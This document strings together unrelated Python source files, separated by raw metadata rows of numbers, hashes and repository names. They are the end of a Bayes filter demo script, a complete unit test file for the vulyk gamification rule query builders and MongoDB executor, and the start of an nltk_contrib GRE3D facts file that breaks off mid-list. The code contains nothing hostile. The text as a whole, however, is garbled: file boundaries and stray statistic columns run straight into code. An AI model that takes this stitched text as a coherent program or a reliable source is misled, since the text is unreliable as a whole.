                                     [0, 0.1, 0.8, 0.1, 0, 0, 0, 0, 0, 0],
                                     [0, 0.1, 0.3, 0.3, 0.3, 0, 0, 0, 0, 0],
                                     [0, 0, 0, 0.1, 0.8, 0.1, 0, 0, 0, 0],
                                     [0, 0, 0, 0, 0.1, 0.8, 0.1, 0, 0, 0],
                                     [0, 0, 0, 0, 0, 0.1, 0.8, 0.1, 0, 0],
                                     [0, 0, 0, 0, 0, 0, 0.1, 0.8, 0.1, 0],
                                     [0, 0, 0, 0, 0, 0, 0, 0.1, 0.8, 0.1],
                                     [0, 0, 0, 0, 0, 0, 0, 0.1, 0.1, 0.8]], dtype=np.float32)


def _advance(belief, measurement, steps=1):
    """Run *steps* predict/update cycles feeding the same *measurement*.

    Returns the updated belief vector; the caller's array is not mutated.
    """
    for _ in range(steps):
        predicted = my_filter.predict(belief, cpt_motion_model)
        belief = my_filter.update(predicted, measurement, cpt_measurement_accuracy)
    return belief


def _report(belief):
    """Print the MAP state and its probability for the current belief."""
    print("Estimated state: " + str(np.argmax(belief)) + " with probability: " + str(belief[np.argmax(belief)]))


# Start from total ignorance (uniform belief) and feed measurement 1.
# (The original script also built a one-hot belief here, but it was
# overwritten before use, so it is dropped.)
print("From unknown position moving to 1")
belief = np.array([0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2], dtype=np.float32)
belief = _advance(belief, 1, steps=10)
_report(belief)

print("Moving to state 2")
belief = _advance(belief, 2, steps=10)
_report(belief)

print("Moving to state 3")
belief = _advance(belief, 3, steps=10)
_report(belief)

# Inject a few wrong readings (2) while the target sits at 3, then recover.
print("Some dirty measures around 3...")
belief = _advance(belief, 2, steps=3)
_report(belief)
belief = _advance(belief, 3)
_report(belief)
belief = _advance(belief, 4)
_report(belief)
| 48.973684
| 112
| 0.532509
| 600
| 3,722
| 3.193333
| 0.083333
| 0.153445
| 0.200418
| 0.227557
| 0.864301
| 0.854906
| 0.854906
| 0.840292
| 0.840292
| 0.83977
| 0
| 0.123457
| 0.3036
| 3,722
| 75
| 113
| 49.626667
| 0.615741
| 0
| 0
| 0.684211
| 0
| 0
| 0.084545
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.035088
| 0
| 0.035088
| 0.175439
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
3b06e4602928c558ea353feae2a638a9a19b8631
| 36,024
|
py
|
Python
|
tests/gamification/test_query_builders.py
|
mrgambal/ner_trainer
|
4ea617bb9a1c4778ce6dfa084c53e2667d037f67
|
[
"BSD-3-Clause"
] | 33
|
2015-01-20T12:12:40.000Z
|
2020-02-23T14:21:24.000Z
|
tests/gamification/test_query_builders.py
|
mrgambal/vulyk
|
4ea617bb9a1c4778ce6dfa084c53e2667d037f67
|
[
"BSD-3-Clause"
] | 48
|
2015-01-13T16:29:44.000Z
|
2020-10-21T13:09:23.000Z
|
tests/gamification/test_query_builders.py
|
mrgambal/ner_trainer
|
4ea617bb9a1c4778ce6dfa084c53e2667d037f67
|
[
"BSD-3-Clause"
] | 9
|
2015-04-01T15:19:13.000Z
|
2021-06-21T15:44:28.000Z
|
# -*- coding: utf-8 -*-
"""
test_query_builders
"""
import unittest
from datetime import date, datetime, timedelta
from bson import ObjectId
from vulyk.blueprints.gamification.core.queries import (
MongoRuleExecutor,
MongoRuleQueryBuilder)
from vulyk.blueprints.gamification.core.rules import Rule, ProjectRule
from vulyk.blueprints.gamification.models.rules import (
RuleModel, AllRules, ProjectAndFreeRules, StrictProjectRules)
from vulyk.models.stats import WorkSession
from ..base import BaseTest
class TestMongoQueryBuilder(BaseTest):
    """Checks the aggregation pipelines MongoRuleQueryBuilder emits per rule flavour."""

    @staticmethod
    def _plain_rule(tasks_number=0, days_number=0,
                    is_weekend=False, is_adjacent=False):
        """Build a Rule with the uninteresting fields defaulted to blanks/zeros."""
        return Rule(
            badge='',
            name='',
            description='',
            bonus=0,
            tasks_number=tasks_number,
            days_number=days_number,
            is_weekend=is_weekend,
            is_adjacent=is_adjacent,
            rule_id='100')

    @staticmethod
    def _project_rule(project, tasks_number=0, days_number=0,
                      is_weekend=False, is_adjacent=False):
        """Build a ProjectRule bound to *project* with boilerplate defaulted."""
        return ProjectRule(
            task_type_name=project,
            badge='',
            name='',
            description='',
            bonus=0,
            tasks_number=tasks_number,
            days_number=days_number,
            is_weekend=is_weekend,
            is_adjacent=is_adjacent,
            rule_id='100')

    def _check(self, rule, user_id, expected):
        """Build the pipeline for *rule* and compare it with *expected*."""
        builder = MongoRuleQueryBuilder(rule=rule)
        self.assertEqual(expected, builder.build_for(user_id))

    def test_n_tasks(self):
        """N tasks overall: match the user's answered sessions, then count."""
        user_id = ObjectId()
        self._check(
            self._plain_rule(tasks_number=20),
            user_id,
            [
                {'$match': {'user': user_id, 'answer': {'$exists': True}}},
                {"$count": "achieved"}
            ])

    def test_n_tasks_project(self):
        """Project-bound rule adds a taskType constraint to the match stage."""
        project = 'fake_tasks'
        user_id = ObjectId()
        self._check(
            self._project_rule(project, tasks_number=20),
            user_id,
            [
                {'$match': {
                    'user': user_id,
                    'taskType': project,
                    'answer': {'$exists': True}}},
                {"$count": "achieved"}
            ])

    def test_n_tasks_m_days(self):
        """N tasks within M days adds an end_time lower bound (midnight M days ago)."""
        user_id = ObjectId()
        then = datetime.combine(date.today() - timedelta(days=7),
                                datetime.min.time())
        self._check(
            self._plain_rule(tasks_number=20, days_number=7),
            user_id,
            [
                {'$match': {
                    'user': user_id,
                    'answer': {'$exists': True},
                    'end_time': {'$gt': then}}},
                {"$count": "achieved"}
            ])

    def test_n_tasks_m_days_project(self):
        """Time window and project constraints combine in a single match stage."""
        project = 'fake_tasks'
        user_id = ObjectId()
        then = datetime.combine(date.today() - timedelta(days=7),
                                datetime.min.time())
        self._check(
            self._project_rule(project, tasks_number=20, days_number=7),
            user_id,
            [
                {'$match': {
                    'user': user_id,
                    'answer': {'$exists': True},
                    'end_time': {'$gt': then},
                    'taskType': project}},
                {"$count": "achieved"}
            ])

    def test_n_tasks_weekends(self):
        """Weekend rule projects calendar fields and keeps Sat (7) / Sun (1) only."""
        user_id = ObjectId()
        self._check(
            self._plain_rule(tasks_number=20, is_weekend=True),
            user_id,
            [
                {'$match': {'user': user_id, 'answer': {'$exists': True}}},
                {'$project': {
                    'dayOfWeek': {'$dayOfWeek': '$end_time'},
                    'year': {'$year': '$end_time'},
                    'week': {'$week': '$end_time'}}},
                {'$match': {'$or': [{'dayOfWeek': 7}, {'dayOfWeek': 1}]}},
                {"$count": "achieved"}
            ])

    def test_n_tasks_weekends_project(self):
        """Weekend filtering with the additional project constraint."""
        project = 'fake_tasks'
        user_id = ObjectId()
        self._check(
            self._project_rule(project, tasks_number=20, is_weekend=True),
            user_id,
            [
                {'$match': {'user': user_id, 'taskType': project, 'answer': {'$exists': True}}},
                {'$project': {
                    'dayOfWeek': {'$dayOfWeek': '$end_time'},
                    'year': {'$year': '$end_time'},
                    'week': {'$week': '$end_time'}}},
                {'$match': {'$or': [{'dayOfWeek': 7}, {'dayOfWeek': 1}]}},
                {"$count": "achieved"}
            ])

    def test_m_weekends(self):
        """M weekends: group by (week, year) so each weekend counts once."""
        user_id = ObjectId()
        self._check(
            self._plain_rule(days_number=7, is_weekend=True),
            user_id,
            [
                {'$match': {'user': user_id, 'answer': {'$exists': True}}},
                {'$project': {
                    'dayOfWeek': {'$dayOfWeek': '$end_time'},
                    'year': {'$year': '$end_time'},
                    'week': {'$week': '$end_time'}}},
                {'$match': {'$or': [{'dayOfWeek': 7}, {'dayOfWeek': 1}]}},
                {'$group': {'_id': {'week': '$week', 'year': '$year'}}},
                {"$count": "achieved"}
            ])

    def test_m_weekends_project(self):
        """M weekends restricted to a single project's tasks."""
        project = 'fake_tasks'
        user_id = ObjectId()
        self._check(
            self._project_rule(project, days_number=7, is_weekend=True),
            user_id,
            [
                {'$match': {'user': user_id, 'answer': {'$exists': True}, 'taskType': project}},
                {'$project': {
                    'dayOfWeek': {'$dayOfWeek': '$end_time'},
                    'year': {'$year': '$end_time'},
                    'week': {'$week': '$end_time'}}},
                {'$match': {'$or': [{'dayOfWeek': 7}, {'dayOfWeek': 1}]}},
                {'$group': {'_id': {'week': '$week', 'year': '$year'}}},
                {"$count": "achieved"}
            ])

    def test_m_weekends_adjacent(self):
        """Adjacent weekends: the look-back window is days_number * 7 days,
        since weekend adjacency is measured in weeks."""
        user_id = ObjectId()
        then = datetime.combine(date.today() - timedelta(days=5 * 7),
                                datetime.min.time())
        self._check(
            self._plain_rule(days_number=5, is_weekend=True, is_adjacent=True),
            user_id,
            [
                {'$match': {'user': user_id, 'answer': {'$exists': True}, 'end_time': {'$gt': then}}},
                {'$project': {
                    'dayOfWeek': {'$dayOfWeek': '$end_time'},
                    'year': {'$year': '$end_time'},
                    'week': {'$week': '$end_time'},
                }},
                {'$match': {'$or': [{'dayOfWeek': 7}, {'dayOfWeek': 1}]}},
                {'$group': {'_id': {'week': '$week', 'year': '$year'}}},
                {"$count": "achieved"}
            ])

    def test_m_weekends_adjacent_project(self):
        """Adjacent weekends combined with the project constraint."""
        project = 'fake_tasks'
        user_id = ObjectId()
        # Weekend adjacency is measured in weeks, hence days_number * 7.
        then = datetime.combine(date.today() - timedelta(days=5 * 7),
                                datetime.min.time())
        self._check(
            self._project_rule(project, days_number=5,
                               is_weekend=True, is_adjacent=True),
            user_id,
            [
                {'$match': {
                    'user': user_id,
                    'answer': {'$exists': True},
                    'end_time': {'$gt': then},
                    'taskType': project}},
                {'$project': {
                    'dayOfWeek': {'$dayOfWeek': '$end_time'},
                    'year': {'$year': '$end_time'},
                    'week': {'$week': '$end_time'}}},
                {'$match': {'$or': [{'dayOfWeek': 7}, {'dayOfWeek': 1}]}},
                {'$group': {'_id': {'week': '$week', 'year': '$year'}}},
                {"$count": "achieved"}
            ])

    def test_m_days_adjacent(self):
        """Adjacent days: window is days_number plain days (no week multiplier);
        sessions are grouped per calendar day."""
        user_id = ObjectId()
        then = datetime.combine(date.today() - timedelta(days=5),
                                datetime.min.time())
        self._check(
            self._plain_rule(days_number=5, is_adjacent=True),
            user_id,
            [
                {'$match': {'user': user_id, 'answer': {'$exists': True}, 'end_time': {'$gt': then}}},
                {'$project': {
                    'day': {'$dayOfMonth': '$end_time'},
                    'month': {'$month': '$end_time'},
                    'year': {'$year': '$end_time'}}},
                {'$group': {
                    '_id': {'day': '$day', 'month': '$month', 'year': '$year'}}},
                {"$count": "achieved"}
            ])

    def test_m_days_adjacent_project(self):
        """Adjacent days combined with the project constraint."""
        project = 'fake_tasks'
        user_id = ObjectId()
        then = datetime.combine(date.today() - timedelta(days=5),
                                datetime.min.time())
        self._check(
            self._project_rule(project, days_number=5, is_adjacent=True),
            user_id,
            [
                {'$match': {
                    'user': user_id,
                    'answer': {'$exists': True},
                    'end_time': {'$gt': then},
                    'taskType': project}},
                {'$project': {
                    'day': {'$dayOfMonth': '$end_time'},
                    'month': {'$month': '$end_time'},
                    'year': {'$year': '$end_time'}}},
                {'$group': {
                    '_id': {'day': '$day', 'month': '$month', 'year': '$year'}}},
                {"$count": "achieved"}
            ])
class TestMongoQueryExecutor(BaseTest):
    """Runs MongoRuleExecutor.achieved against real WorkSession documents."""

    # Shared time anchors; NOW is fixed once at class-definition time.
    NOW = datetime.now()
    HOUR = timedelta(hours=1)
    DAY = timedelta(days=1)

    def tearDown(self):
        # Each test creates its own sessions; wipe them for independence.
        WorkSession.objects.delete()
        super().tearDown()

    @staticmethod
    def _plain_rule(tasks_number=0, days_number=0,
                    is_weekend=False, is_adjacent=False):
        """Build a Rule with the uninteresting fields defaulted."""
        return Rule(
            badge='',
            name='',
            description='',
            bonus=0,
            tasks_number=tasks_number,
            days_number=days_number,
            is_weekend=is_weekend,
            is_adjacent=is_adjacent,
            rule_id='100')

    @staticmethod
    def _project_rule(task_type_name, tasks_number=0, days_number=0,
                      is_weekend=False, is_adjacent=False):
        """Build a ProjectRule bound to *task_type_name* with boilerplate defaulted."""
        return ProjectRule(
            rule_id='100',
            task_type_name=task_type_name,
            badge='',
            name='',
            description='',
            bonus=0,
            tasks_number=tasks_number,
            days_number=days_number,
            is_weekend=is_weekend,
            is_adjacent=is_adjacent)

    @staticmethod
    def _save_session(user, task_type, start_time, end_time=None, answered=True):
        """Persist a WorkSession.

        Pass answered=False to omit the `answer` field (session not counted
        by the rules' `answer $exists` match) and end_time=None to model an
        unclosed session.
        """
        fields = {
            'user': user,
            'task': ObjectId(),
            'task_type': task_type,
            'start_time': start_time,
        }
        if answered:
            fields['answer'] = ObjectId()
        if end_time is not None:
            fields['end_time'] = end_time
        WorkSession(**fields).save()

    def _achieved(self, uid, rule):
        """Shorthand for running the executor over the saved sessions."""
        return MongoRuleExecutor.achieved(
            user_id=uid, rule=rule, collection=WorkSession.objects)

    def test_n_tasks_ok(self):
        """Three answered sessions satisfy a 3-task rule."""
        uid = ObjectId()
        rule = self._plain_rule(tasks_number=3)
        self._save_session(uid, 'fake_task', self.NOW - self.HOUR, self.NOW)
        self._save_session(uid, 'fake_task_two', self.NOW - self.DAY, self.NOW)
        self._save_session(uid, 'fake_task_three', self.NOW - self.DAY * 2, self.NOW)
        # Another user's session must not count towards uid's total.
        self._save_session(ObjectId(), 'fake_task', self.NOW - self.HOUR, self.NOW)
        self.assertTrue(self._achieved(uid, rule))

    def test_n_tasks_fail(self):
        """Sessions without an answer do not count towards the quota."""
        uid = ObjectId()
        rule = self._plain_rule(tasks_number=3)
        self._save_session(uid, 'fake_task', self.NOW - self.HOUR, self.NOW,
                           answered=False)
        self._save_session(uid, 'fake_task_two', self.NOW - self.DAY, self.NOW,
                           answered=False)
        self._save_session(ObjectId(), 'fake_task', self.NOW - self.HOUR, self.NOW,
                           answered=False)
        self.assertFalse(self._achieved(uid, rule))

    def test_n_tasks_unclosed_session_fail(self):
        """An unclosed (no end_time) unanswered session does not count."""
        uid = ObjectId()
        rule = self._plain_rule(tasks_number=3)
        self._save_session(uid, 'fake_task', self.NOW - self.HOUR, self.NOW,
                           answered=False)
        self._save_session(uid, 'fake_task', self.NOW - self.DAY,
                           answered=False)
        self.assertFalse(self._achieved(uid, rule))

    def test_n_tasks_project_ok(self):
        """Three answered sessions of the bound project satisfy the rule."""
        uid = ObjectId()
        task_type_name = 'fake_task'
        rule = self._project_rule(task_type_name, tasks_number=3)
        for delta in (self.HOUR, self.DAY, self.DAY * 2):
            self._save_session(uid, task_type_name, self.NOW - delta, self.NOW)
        # Another user's session of the same project must not count.
        self._save_session(ObjectId(), task_type_name, self.NOW - self.HOUR, self.NOW)
        self.assertTrue(self._achieved(uid, rule))

    def test_n_tasks_project_fail(self):
        """Sessions of a different task type must not satisfy a project rule.

        NOTE(review): the original test was a copy of test_n_tasks_project_ok
        and asserted success, so the failure path was never exercised.
        """
        uid = ObjectId()
        rule = self._project_rule('fake_task', tasks_number=3)
        # Enough answered sessions, but all belong to another project.
        for delta in (self.HOUR, self.DAY, self.DAY * 2):
            self._save_session(uid, 'other_task', self.NOW - delta, self.NOW)
        self.assertFalse(self._achieved(uid, rule))

    def test_n_tasks_m_days_ok(self):
        """21 tasks spread over the last 7 days satisfy a 21-in-7 rule."""
        uid = ObjectId()
        rule = self._plain_rule(tasks_number=21, days_number=7)
        for i in range(1, 22):
            day_i = self.NOW - self.DAY * (i % 7)
            self._save_session(uid, 'fake_task_%s' % (i % 3), day_i, day_i)
        self.assertTrue(self._achieved(uid, rule))

    def test_n_tasks_m_days_project_ok(self):
        """Project rule satisfied by many sessions of the bound type."""
        uid = ObjectId()
        task_type_name = 'fake_task'
        rule = self._project_rule(task_type_name, tasks_number=3)
        for i in range(1, 22):
            day_i = self.NOW - self.DAY * (i % 7)
            self._save_session(uid, task_type_name, day_i, day_i)
        self.assertTrue(self._achieved(uid, rule))

    def test_n_tasks_m_days_more_days(self):
        """Tasks spread over 9 days miss the 7-day window: too few remain."""
        uid = ObjectId()
        rule = self._plain_rule(tasks_number=21, days_number=7)
        for i in range(1, 22):
            # Tasks are spread across 9 days, which is more than the window.
            day_i = self.NOW - self.DAY * (i % 9)
            self._save_session(uid, 'fake_task_%s' % (i % 3), day_i, day_i)
        self.assertFalse(self._achieved(uid, rule))

    def test_n_tasks_m_days_less_tasks(self):
        """Only 20 tasks in the window: one short of the 21-task quota."""
        uid = ObjectId()
        rule = self._plain_rule(tasks_number=21, days_number=7)
        for i in range(1, 21):
            day_i = self.NOW - self.DAY * (i % 3)
            self._save_session(uid, 'fake_task_%s' % (i % 3), day_i, day_i)
        self.assertFalse(self._achieved(uid, rule))

    def test_n_tasks_weekends_sun(self):
        """21 tasks done on a Sunday satisfy a 20-task weekend rule."""
        uid = ObjectId()
        rule = self._plain_rule(tasks_number=20, is_weekend=True)
        # Days back to the most recent Sunday (weekday() == 6).
        to_sun = timedelta(days=(self.NOW.weekday() + 1) % 7)
        day_i = (self.NOW - to_sun) - self.DAY * 7
        for i in range(1, 22):
            self._save_session(uid, 'fake_task_%s' % (i % 3), day_i, day_i)
        self.assertTrue(self._achieved(uid, rule))

    def test_n_tasks_weekends_sat(self):
        """21 tasks done on a Saturday satisfy a 20-task weekend rule.

        NOTE(review): the original offset `(weekday() + 1) % 6` landed on a
        Sunday for most weekdays; `(weekday() + 2) % 7` is the distance back
        to the most recent Saturday (weekday() == 5).
        """
        uid = ObjectId()
        rule = self._plain_rule(tasks_number=20, is_weekend=True)
        to_sat = timedelta(days=(self.NOW.weekday() + 2) % 7)
        day_i = (self.NOW - to_sat) - self.DAY * 7
        for i in range(1, 22):
            self._save_session(uid, 'fake_task_%s' % (i % 3), day_i, day_i)
        self.assertTrue(self._achieved(uid, rule))

    def test_n_tasks_weekends_mon_fail(self):
        """Tasks done on a Monday do not satisfy a weekend rule."""
        uid = ObjectId()
        rule = self._plain_rule(tasks_number=20, is_weekend=True)
        # weekday() itself is the distance back to the most recent Monday.
        to_mon = timedelta(days=self.NOW.weekday())
        day_i = (self.NOW - to_mon) - self.DAY * 7
        for i in range(1, 22):
            self._save_session(uid, 'fake_task_%s' % (i % 3), day_i, day_i)
        self.assertFalse(self._achieved(uid, rule))

    def test_m_weekends(self):
        """Seven distinct (non-adjacent) weekend weeks satisfy the rule."""
        uid = ObjectId()
        rule = self._plain_rule(days_number=7, is_weekend=True)
        to_sun = timedelta(days=(self.NOW.weekday() + 1) % 7)
        for i in range(1, 8):
            # One session every second Sunday: 7 distinct weekend weeks.
            day_i = (self.NOW - to_sun) - (self.DAY * 7 * i * 2)
            self._save_session(uid, 'fake_task', day_i, day_i)
        self.assertTrue(self._achieved(uid, rule))

    def test_m_weekends_project(self):
        """Seven weekend weeks within the bound project satisfy the rule."""
        uid = ObjectId()
        task_type_name = 'fake_task'
        rule = self._project_rule(task_type_name, days_number=7, is_weekend=True)
        to_sun = timedelta(days=(self.NOW.weekday() + 1) % 7)
        for i in range(1, 8):
            # One session every second Sunday: 7 distinct weekend weeks.
            day_i = (self.NOW - to_sun) - (self.DAY * 7 * i * 2)
            self._save_session(uid, task_type_name, day_i, day_i)
        self.assertTrue(self._achieved(uid, rule))

    def test_m_adjacent_weekends(self):
        """Eight consecutive Sundays satisfy a 7-adjacent-weekends rule."""
        uid = ObjectId()
        rule = self._plain_rule(days_number=7, is_weekend=True, is_adjacent=True)
        to_sun = timedelta(days=(self.NOW.weekday() + 1) % 7)
        for i in range(0, 8):
            # One session per week, no gaps (adjacency requirement).
            day_i = (self.NOW - to_sun) - (self.DAY * 7 * i)
            self._save_session(uid, 'fake_task', day_i, day_i)
        self.assertTrue(self._achieved(uid, rule))

    def test_m_adjacent_weekends_project(self):
        """Eight consecutive Sundays of the bound project satisfy the rule."""
        uid = ObjectId()
        task_type_name = 'fake_task'
        rule = self._project_rule(task_type_name, days_number=7,
                                  is_weekend=True, is_adjacent=True)
        to_sun = timedelta(days=(self.NOW.weekday() + 1) % 7)
        for i in range(0, 8):
            # One session per week, no gaps (adjacency requirement).
            day_i = (self.NOW - to_sun) - (self.DAY * 7 * i)
            self._save_session(uid, task_type_name, day_i, day_i)
        self.assertTrue(self._achieved(uid, rule))

    def test_m_days_adjacent_ok(self):
        """Five consecutive days with a session satisfy a 5-adjacent-days rule."""
        uid = ObjectId()
        rule = self._plain_rule(days_number=5, is_adjacent=True)
        for i in range(1, 6):
            day_i = self.NOW - self.DAY * i
            self._save_session(uid, 'fake_task', day_i, day_i)
        self.assertTrue(self._achieved(uid, rule))

    def test_m_days_adjacent_project_ok(self):
        """Five consecutive days within the bound project satisfy the rule."""
        uid = ObjectId()
        task_type_name = 'fake_task'
        rule = self._project_rule(task_type_name, days_number=5, is_adjacent=True)
        for i in range(1, 6):
            day_i = self.NOW - self.DAY * i
            self._save_session(uid, task_type_name, day_i, day_i)
        self.assertTrue(self._achieved(uid, rule))

    def test_m_days_adjacent_project_fail(self):
        """Sessions of other task types do not satisfy the project rule."""
        uid = ObjectId()
        rule = self._project_rule('fake_task', days_number=5, is_adjacent=True)
        for i in range(1, 6):
            day_i = self.NOW - self.DAY * i
            # Each session belongs to a different (wrong) project.
            self._save_session(uid, 'fake_task_%s' % i, day_i, day_i)
        self.assertFalse(self._achieved(uid, rule))
class TestRuleModel(BaseTest):
RULES = [
Rule(
badge='',
name='rule_1',
description='',
bonus=0,
tasks_number=3,
days_number=0,
is_weekend=False,
is_adjacent=False,
rule_id='100'),
Rule(
badge='',
name='rule_2',
description='',
bonus=10,
tasks_number=30,
days_number=0,
is_weekend=False,
is_adjacent=False,
rule_id='200'),
ProjectRule(
rule_id='300',
task_type_name='project_1',
badge='',
name='rule_3',
description='',
bonus=0,
tasks_number=40,
days_number=0,
is_weekend=False,
is_adjacent=False),
ProjectRule(
rule_id='400',
task_type_name='project_2',
badge='',
name='rule_4',
description='',
bonus=0,
tasks_number=0,
days_number=5,
is_weekend=False,
is_adjacent=True),
]
    def setUp(self):
        """Persist every fixture rule before each test."""
        super().setUp()
        for rule in self.RULES:
            RuleModel.from_rule(rule).save()
    def tearDown(self):
        """Drop all persisted rules so tests stay independent."""
        RuleModel.objects.delete()
        super().tearDown()
    def test_everything_ok(self):
        """AllRules with no exclusions returns every stored rule."""
        self.assertEqual(
            len(self.RULES),
            len(list(RuleModel.get_actual_rules([], AllRules(), False)))
        )
    def test_everything_project_1(self):
        """ProjectAndFreeRules('project_1') yields the free rules plus '300',
        and never the 'project_2'-bound rule '400'."""
        rules = list(RuleModel.get_actual_rules(
            [], ProjectAndFreeRules('project_1'), False))
        self.assertEqual(3, len(rules))
        self.assertTrue(any(r.id == '300' for r in rules))
        self.assertTrue(all(r.id != '400' for r in rules))
    def test_everything_project_2(self):
        """ProjectAndFreeRules('project_2') yields the free rules plus '400',
        and never the 'project_1'-bound rule '300'."""
        rules = list(RuleModel.get_actual_rules(
            [], ProjectAndFreeRules('project_2'), False))
        self.assertEqual(3, len(rules))
        self.assertTrue(any(r.id == '400' for r in rules))
        self.assertTrue(all(r.id != '300' for r in rules))
    def test_everything_and_weekend(self):
        """The weekend flag controls whether weekend-only rules are returned."""
        # Add a fifth rule that only applies on weekends.
        RuleModel.from_rule(
            Rule(
                badge='',
                name='rule_5',
                description='',
                bonus=0,
                tasks_number=3,
                days_number=0,
                is_weekend=True,
                is_adjacent=False,
                rule_id='500')).save()
        rules = list(RuleModel.get_actual_rules([], AllRules(), True))
        rules_no_weekend = list(
            RuleModel.get_actual_rules([], AllRules(), False))
        # With is_weekend=True the new rule is included; without it, excluded.
        self.assertEqual(5, len(rules))
        self.assertTrue(any(r.id == '500' for r in rules))
        self.assertEqual(4, len(rules_no_weekend))
        self.assertTrue(all(r.id != '500' for r in rules_no_weekend))
def test_exclude_ids(self):
ids = ['100', '200']
rules = list(RuleModel.get_actual_rules(ids, AllRules(), False))
self.assertEqual(2, len(rules))
self.assertTrue(all(r.id not in ids for r in rules))
def test_exclude_ids_project(self):
ids = ['100', '200']
rules = list(RuleModel.get_actual_rules(
ids, ProjectAndFreeRules('project_1'), False))
self.assertEqual(1, len(rules))
self.assertTrue(rules[0].id, '300')
def test_exclude_ids_weekend(self):
RuleModel.from_rule(
Rule(
badge='',
name='rule_5',
description='',
bonus=0,
tasks_number=3,
days_number=0,
is_weekend=True,
is_adjacent=False,
rule_id='500')).save()
ids = ['100', '200']
rules = list(RuleModel.get_actual_rules(ids, AllRules(), True))
self.assertEqual(3, len(rules))
self.assertTrue(any(r.id == '500' for r in rules))
def test_exclude_ids_project_weekend(self):
RuleModel.from_rule(
Rule(
badge='',
name='rule_5',
description='',
bonus=0,
tasks_number=3,
days_number=0,
is_weekend=True,
is_adjacent=False,
rule_id='500')).save()
RuleModel.from_rule(
ProjectRule(
task_type_name='project_3',
badge='',
name='rule_6',
description='',
bonus=0,
tasks_number=3,
days_number=0,
is_weekend=True,
is_adjacent=False,
rule_id='600')).save()
ids = ['100', '500']
rules = list(RuleModel.get_actual_rules(
ids, ProjectAndFreeRules('project_3'), True))
self.assertEqual(2, len(rules))
self.assertTrue(all(r.id in ['200', '600'] for r in rules))
self.assertTrue(all(r.id != '500' for r in rules))
def test_exclude_ids_strict_project_weekend(self):
RuleModel.from_rule(
Rule(
badge='',
name='rule_5',
description='',
bonus=0,
tasks_number=3,
days_number=0,
is_weekend=True,
is_adjacent=False,
rule_id='500')).save()
RuleModel.from_rule(
ProjectRule(
task_type_name='project_3',
badge='',
name='rule_6',
description='',
bonus=0,
tasks_number=3,
days_number=0,
is_weekend=True,
is_adjacent=False,
rule_id='600')).save()
ids = ['100', '500']
rules = list(RuleModel.get_actual_rules(
ids, StrictProjectRules('project_3'), True))
self.assertEqual(1, len(rules))
self.assertTrue(rules[0].id, '600')
# Allow running the tests in this module directly.
if __name__ == '__main__':
    unittest.main()
| 32.689655
| 98
| 0.490701
| 3,609
| 36,024
| 4.680244
| 0.045719
| 0.035048
| 0.030549
| 0.052099
| 0.930259
| 0.920845
| 0.911847
| 0.900539
| 0.898881
| 0.879522
| 0
| 0.020278
| 0.381246
| 36,024
| 1,101
| 99
| 32.719346
| 0.737506
| 0.007634
| 0
| 0.859833
| 0
| 0
| 0.059808
| 0
| 0
| 0
| 0
| 0
| 0.055439
| 1
| 0.044979
| false
| 0
| 0.008368
| 0
| 0.060669
| 0.003138
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3b2a38e30f0380e37dbe5bbbbb468a995fd6bc7b
| 19,551
|
py
|
Python
|
modules/nltk_contrib/refexpr/gre3d_facts.py
|
h4ck3rm1k3/NLP-project
|
aeba6302f60d27a8b9e65ad28d2d74e1276c7cd6
|
[
"MIT"
] | 123
|
2015-01-06T10:46:18.000Z
|
2022-02-01T10:05:16.000Z
|
nltk_contrib/refexpr/gre3d_facts.py
|
silky/nltk_contrib
|
c152bde901f05915e90b07a615b232adb123bed8
|
[
"Apache-2.0"
] | 12
|
2015-01-13T06:27:18.000Z
|
2020-07-30T23:00:41.000Z
|
nltk_contrib/refexpr/gre3d_facts.py
|
silky/nltk_contrib
|
c152bde901f05915e90b07a615b232adb123bed8
|
[
"Apache-2.0"
] | 114
|
2015-01-13T04:47:49.000Z
|
2021-11-13T08:16:02.000Z
|
from full_brevity import *
from incremental import *
from relational import *
import util
def getFacts():
    """
    Return the hand-entered fact base for the 20 GRE3D scenes.

    Objects are always numbered from left to right.
    The referent is always r1.
    Distractors are labeled based on the first letter of their type:
    s1 = first sphere, c1 = first cube, s2 = second sphere etc.
    This data was entered manually, but came from analyzing the
    pictures from the GRE3D data set provided by Viethen and Dale 2008.
    """
    # Each fact is a list: [attribute, value, object] for unary properties
    # (Type, "color", "size", "side") or [Rel, relation, obj_a, obj_b] for
    # binary spatial relations. f1 is the floor object present in every scene.
    facts = {}
    facts[1] = [[Type, "sphere", "r1"], [Type, "cube", "c1"], [Type, "cube", "c2"],
        ["color", "green", "r1"], ["color", "blue", "c1"], ["color", "blue", "c2"],
        [Type, "floor", "f1"],
        ["size", "small", "r1"], ["size", "large", "c1"],["size", "large", "c2"],
        [Rel, "left_of", "c1", "c2"], [Rel, "right_of", "c2", "c1"],
        [Rel, "left_of", "c1", "r1"], [Rel, "right_of", "r1", "c1"],
        ["side", "right", "r1"], ["side", "left", "c1" ], ["side", "right", "c2" ],
        [Rel, "on", "r1", "c2"], [Rel, "on", "c2", "f1"], [Rel, "on", "c1", "f1"],
        [Rel, "under", "f1", "c2"], [Rel, "under", "f1", "c1"],
        ["color", "None", "f1"], ["size", "None", "f1"], ["side", "None", "f1"]
        ]
    facts[2] = [[Type, "sphere", "r1"], [Type, "cube", "c1"], [Type, "cube", "c2"],
        ["color", "red", "r1"], ["color", "yellow", "c1"], ["color", "red", "c2"],
        [Type, "floor", "f1"],
        ["size", "small", "r1"], ["size", "large", "c1"],["size", "small", "c2"],
        [Rel, "left_of", "c1", "c2"], [Rel, "right_of", "c2", "c1"],
        [Rel, "left_of", "r1", "c2"], [Rel, "right_of", "c2", "r1"],
        ["side", "left", "r1"], ["side", "left", "c1" ], ["side", "right", "c2" ],
        [Rel, "in_front_of", "r1", "c1"], [Rel, "behind", "c1", "r1"],
